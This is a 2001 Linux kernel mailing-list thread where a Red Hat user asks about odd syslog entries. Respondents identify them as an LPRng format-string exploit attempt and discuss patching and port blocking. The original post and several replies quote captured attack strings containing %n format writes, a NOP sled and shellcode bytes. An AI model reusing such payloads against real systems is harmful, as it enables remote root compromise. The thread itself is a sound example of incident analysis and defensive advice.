* Strange errors in /var/log/messages
@ 2001-07-02 16:05 kernel
2001-07-02 16:11 ` Remco B. Brink
` (2 more replies)
0 siblings, 3 replies; 8+ messages in thread
From: kernel @ 2001-07-02 16:05 UTC (permalink / raw)
To: linux-kernel; +Cc: Enforcer
Hi!
I'm running RedHat 7.0 with all official RH patches applied. The kernel I
currently run fow a few days is 2.2.19-7.0.8
I run the pre-compiled kernel of RH. Suddenly I the following messages:
Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
'BBXXXXXXXXXXXXXXXXXX%.176u%3
00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf
<CUT>
Jul 2 15:12:53 gateway SERVER[1152]: Dispatch_input: bad request line
'BBTUVWXXXXXXXXXXXXXXXXXX%.20u%30
0$n%.166u%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
0\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf\211
This continued for about half an hour. Then it stopped. What's going on
here??
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 16:05 Strange errors in /var/log/messages kernel
@ 2001-07-02 16:11 ` Remco B. Brink
2001-07-02 16:16 ` Alan Cox
2001-07-02 17:00 ` Richard B. Johnson
2 siblings, 0 replies; 8+ messages in thread
From: Remco B. Brink @ 2001-07-02 16:11 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
<kernel@ddx.a2000.nu> writes:
> Hi!
>
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> currently run fow a few days is 2.2.19-7.0.8
> I run the pre-compiled kernel of RH. Suddenly I the following messages:
<snip error messages>
> This continued for about half an hour. Then it stopped. What's going on
> here??
Here you have two options:
You are either under attack by someone who's trying to exploit your
LPRng (someone's trying to use LPR's logging function to get a shell).
This is the LPRng string format _syslog bug that theoretically could
allow root access. For more info check http://www.securityfocus.com/vdb/bottom.html?vid=1712
The other option is that you're under rpc.statd attack at the moment.
In either case, make sure you upgraded to the latest patch versions
and subscribe to BugTraq and the Security Focus Incidents mailinglist :)
regards,
Remco
--
Remco B. Brink - SOL Børs A/S systemsdeveloper - http://www.norge-invest.no
Personal site at http://rc6.org - PGP/GnuPG key at http://rc6.org/rbb.pgp
"What you end up with, after running an operating system concept through
these many marketing coffee filters, is something not unlike plain hot
water."
(By Matt Welsh)
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 16:05 Strange errors in /var/log/messages kernel
2001-07-02 16:11 ` Remco B. Brink
@ 2001-07-02 16:16 ` Alan Cox
2001-07-02 17:42 ` Guest section DW
2001-07-02 17:00 ` Richard B. Johnson
2 siblings, 1 reply; 8+ messages in thread
From: Alan Cox @ 2001-07-02 16:16 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> currently run fow a few days is 2.2.19-7.0.8
> I run the pre-compiled kernel of RH. Suddenly I the following messages:
>
> Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
These are for an application. Not sure which or why
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 16:05 Strange errors in /var/log/messages kernel
2001-07-02 16:11 ` Remco B. Brink
2001-07-02 16:16 ` Alan Cox
@ 2001-07-02 17:00 ` Richard B. Johnson
2001-07-02 18:23 ` [OT] " Ville Herva
2 siblings, 1 reply; 8+ messages in thread
From: Richard B. Johnson @ 2001-07-02 17:00 UTC (permalink / raw)
To: kernel; +Cc: linux-kernel, Enforcer
On Mon, 2 Jul 2001 kernel@ddx.a2000.nu wrote:
> Hi!
>
> I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> currently run fow a few days is 2.2.19-7.0.8
> I run the pre-compiled kernel of RH. Suddenly I the following messages:
>
> Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf
>
> <CUT>
>
> Jul 2 15:12:53 gateway SERVER[1152]: Dispatch_input: bad request line
> 'BBTUVWXXXXXXXXXXXXXXXXXX%.20u%30
> 0$n%.166u%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> 0\220\220\220\220\220111F\200\2111f\2111\211C\211]C\211]K\211M\215M\2001\211ECf\211
>
> This continued for about half an hour. Then it stopped. What's going on
> here??
>
> -
I think you just got 'rooted'. Look at /etc/inetd.conf (if it exists
on your system, the xinetd is more robust). It may have a new entry
on its last line providing a root shell to anybody. This looks somewhat
like an attack shown by CERN about 6 to 12 months ago.
Cheers,
Dick Johnson
Penguin : Linux version 2.4.1 on an i686 machine (799.53 BogoMips).
I was going to compile a list of innovations that could be
attributed to Microsoft. Once I realized that Ctrl-Alt-Del
was handled in the BIOS, I found that there aren't any.
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 16:16 ` Alan Cox
@ 2001-07-02 17:42 ` Guest section DW
2001-07-02 19:51 ` kernel
0 siblings, 1 reply; 8+ messages in thread
From: Guest section DW @ 2001-07-02 17:42 UTC (permalink / raw)
To: Alan Cox, kernel; +Cc: linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
> > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > currently run fow a few days is 2.2.19-7.0.8
> > I run the pre-compiled kernel of RH. Suddenly I the following messages:
> >
> > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> These are for an application. Not sure which or why
See CERT Advisory CA-2000-22
http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
"A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format string
vulnerability," which may allow remote users to execute arbitrary code on
vulnerable systems."
^ permalink raw reply [flat|nested] 8+ messages in thread
* [OT] Re: Strange errors in /var/log/messages
2001-07-02 17:00 ` Richard B. Johnson
@ 2001-07-02 18:23 ` Ville Herva
0 siblings, 0 replies; 8+ messages in thread
From: Ville Herva @ 2001-07-02 18:23 UTC (permalink / raw)
To: Richard B. Johnson; +Cc: kernel, linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 01:00:33PM -0400, you [Richard B. Johnson] claimed:
> > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> > 0\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
>
> I think you just got 'rooted'. Look at /etc/inetd.conf (if it exists
> on your system, the xinetd is more robust). It may have a new entry
> on its last line providing a root shell to anybody. This looks somewhat
> like an attack shown by CERN about 6 to 12 months ago.
(This has nothing to do with linux-kernel, sorry...)
I don't think anything particular in that message suggests he actually got
rooted? It just seems that somebody tried to exploit lprNG hole (or
something else) and the daemon logged that. Of course, it *is* perfectly
possible, that he _got_ rooted (although he said he was running redhat-7.0
with all the updates).
(The attacker may have tried other attacks so if he got rooted, those above
are not necessarily the related log messages. In any case, a 'smart' intruder
would have cleaned the log. Also, 'smart' attacker propably uses something
more advanced as backdoor than /etc/inetd.conf these days.)
Or is there something that actually indicates a succesfull intrusion in the
log snippet that I'm missing?
-- v --
v@iki.fi
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 17:42 ` Guest section DW
@ 2001-07-02 19:51 ` kernel
2001-07-03 7:45 ` David Weinehall
0 siblings, 1 reply; 8+ messages in thread
From: kernel @ 2001-07-02 19:51 UTC (permalink / raw)
To: Guest section DW; +Cc: Alan Cox, linux-kernel, Enforcer
On Mon, 2 Jul 2001, Guest section DW wrote:
> On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
>
> > > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > > currently run fow a few days is 2.2.19-7.0.8
> > > I run the pre-compiled kernel of RH. Suddenly I the following messages:
> > >
> > > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
>
> > These are for an application. Not sure which or why
>
> See CERT Advisory CA-2000-22
> http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
>
> "A popular replacement software package to the BSD lpd printing service
> called LPRng contains at least one software defect, known as a "format string
> vulnerability," which may allow remote users to execute arbitrary code on
> vulnerable systems."
I just read the article. It seems somebody tried to exploid a bug in
LPRng. Unfortunately I didn't check the TCP/IP connections at the time of
attack (with netstat), so I couldn't tell who was connected to port 515.
The article suggest upgrading to 3.6.25. I'm currenlty running 3.7.4-23.
I assume I'm not vulnerable, but those 'errors' in the logfile really
scared the heck out of me! :) To be certain, I just blocked poort 515 for
outbound connections. :)
Bye the way, sorry this message was off-topic, but I didn't know it was a
LPRng issue, not a kernel issue.
Thanks!
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: Strange errors in /var/log/messages
2001-07-02 19:51 ` kernel
@ 2001-07-03 7:45 ` David Weinehall
0 siblings, 0 replies; 8+ messages in thread
From: David Weinehall @ 2001-07-03 7:45 UTC (permalink / raw)
To: kernel; +Cc: Guest section DW, Alan Cox, linux-kernel, Enforcer
On Mon, Jul 02, 2001 at 09:51:44PM +0200, kernel@ddx.a2000.nu wrote:
> On Mon, 2 Jul 2001, Guest section DW wrote:
>
> > On Mon, Jul 02, 2001 at 05:16:23PM +0100, Alan Cox wrote:
> >
> > > > I'm running RedHat 7.0 with all official RH patches applied. The kernel I
> > > > currently run fow a few days is 2.2.19-7.0.8
> > > > I run the pre-compiled kernel of RH. Suddenly I the following messages:
> > > >
> > > > Jul 2 15:12:16 gateway SERVER[1240]: Dispatch_input: bad request line
> > > > 'BBXXXXXXXXXXXXXXXXXX%.176u%3
> > > > 00$nsecurity.%301$n%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\22
> >
> > > These are for an application. Not sure which or why
> >
> > See CERT Advisory CA-2000-22
> > http://www.infowar.com/iwftp/cert/advisories/CA-2000-22.html
> >
> > "A popular replacement software package to the BSD lpd printing service
> > called LPRng contains at least one software defect, known as a "format string
> > vulnerability," which may allow remote users to execute arbitrary code on
> > vulnerable systems."
>
> I just read the article. It seems somebody tried to exploid a bug in
> LPRng. Unfortunately I didn't check the TCP/IP connections at the time of
> attack (with netstat), so I couldn't tell who was connected to port 515.
> The article suggest upgrading to 3.6.25. I'm currenlty running 3.7.4-23.
> I assume I'm not vulnerable, but those 'errors' in the logfile really
> scared the heck out of me! :) To be certain, I just blocked poort 515 for
> outbound connections. :)
>
> Bye the way, sorry this message was off-topic, but I didn't know it was a
> LPRng issue, not a kernel issue.
A good idea is to block all ports, then open only those you know needs to
be open. Paranoia is good.
/David
_ _
// David Weinehall <tao@acc.umu.se> /> Northern lights wander \\
// Project MCA Linux hacker // Dance across the winter sky //
\> http://www.acc.umu.se/~tao/ </ Full colour fire </
^ permalink raw reply [flat|nested] 8+ messages in thread
end of thread, other threads:[~2001-07-03 7:46 UTC | newest]
Thread overview: 8+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2001-07-02 16:05 Strange errors in /var/log/messages kernel
2001-07-02 16:11 ` Remco B. Brink
2001-07-02 16:16 ` Alan Cox
2001-07-02 17:42 ` Guest section DW
2001-07-02 19:51 ` kernel
2001-07-03 7:45 ` David Weinehall
2001-07-02 17:00 ` Richard B. Johnson
2001-07-02 18:23 ` [OT] " Ville Herva
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).